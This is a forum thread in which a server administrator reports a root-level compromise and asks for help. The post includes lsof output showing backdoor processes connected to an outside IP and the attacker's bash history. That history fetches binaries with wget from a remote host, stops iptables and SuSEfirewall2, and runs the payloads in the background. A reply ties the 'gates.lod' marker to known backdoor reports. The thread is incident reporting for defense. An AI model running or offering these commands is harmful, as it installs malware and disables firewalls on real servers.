Security Problem server Violated

yena · Jan 4, 2016

Hello, i have several server violated, root escaletion.

Some details:

----------------------------------------------------------------
root@prx:/home/enrico# lsof -p 361304
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
503 361304 root cwd DIR 0,25 4096 173550103 /var/lib/vz/root/301/root
503 361304 root rtd DIR 0,25 4096 173280478 /var/lib/vz/root/301
503 361304 root txt REG 0,25 1312292 173551473 (deleted)/var/lib/vz/root/301/root/503
503 361304 root mem REG 253,2 173551473 (deleted)/var/lib/vz/root/301/root/503 (stat: No such file or directory)
503 361304 root 0u sock 0,6 0t0 28144031 can't identify protocol
503 361304 root 1u IPv4 28144067 0t0 TCP 83-103-59-172.ip.fastwebnet.it:51503->23.234.50.12:25003 (ESTABLISHED)
503 361304 root 2u raw 0t0 28186896 00000000:00FF->00000000:0000 st=07
root@prxcmc:/home/enrico#
---------------------------------------------------------------------
root@prx:/home/enrico# lsof -p 361321
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
04 361321 root cwd DIR 0,25 4096 173550103 /var/lib/vz/root/301/root
04 361321 root rtd DIR 0,25 4096 173280478 /var/lib/vz/root/301
04 361321 root txt REG 0,25 1223123 173551472 /var/lib/vz/root/301/root/04
04 361321 root mem REG 253,2 173551472 /var/lib/vz/root/301/root/04 (path dev=0,25)
04 361321 root 0u CHR 1,3 0t0 1444042 /var/lib/vz/root/301/dev/null
04 361321 root 1u CHR 1,3 0t0 1444042 /var/lib/vz/root/301/dev/null
04 361321 root 2u CHR 1,3 0t0 1444042 /var/lib/vz/root/301/dev/null
04 361321 root 3u REG 0,25 5 173408660 /var/lib/vz/root/301/tmp/gates.lod
04 361321 root 4u IPv4 28144377 0t0 TCP 83-103-59-172.ip.fastwebnet.it:56004->23.234.50.12:25004 (ESTABLISHED)
04 361321 root 5u raw 0t0 28144451 00000000:0011->00000000:0000 st=07
root@prxcmc:/home/enrico#
--------------------------------------------------------------------------------

Some Bash_history log:

wget http://111.74.239.61:8080/503
wget http://111.74.239.61:8080/04
chmod 0755 /root/503
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
nohup /root/503 > /dev/null 2>&1 &
chmod 0755 /root/04
chmod 0755 /root/04
nohup /root/04 > /dev/null 2>&1 &
-------------------------------------------------------------

a binary named 04 in /root dir is created:

lsof -p 23462
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
04 23462 root cwd DIR 0,20 17 11822 /root
04 23462 root rtd DIR 0,20 24 4 /
04 23462 root txt REG 0,20 1223123 72192 /root/04 (deleted)
04 23462 root 0u CHR 1,3 0t0 6 /dev/null
04 23462 root 1u CHR 1,3 0t0 6 /dev/null
04 23462 root 2u CHR 1,3 0t0 6 /dev/null
04 23462 root 3uW REG 0,20 5 72194 /tmp/gates.lod (deleted)

-----------------------------------------------------------------------------------------------

Someone have my same experience ?
Now i'm tryng to clean manually ..

Thanks
Enrico

windinternet · Jan 4, 2016

It seems that more people have run into this backdoor installed on their system. The gates.lod seems to be quite identifying.

http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/
http://ubuntuforums.org/showthread.php?t=2246312&page=4
https://blog.smarthoneypot.com/in-depth-analysis-of-ssh-attacks-on-amazon-ec2/

Search

Search

Security Problem server Violated

yena

Renowned Member

windinternet

Member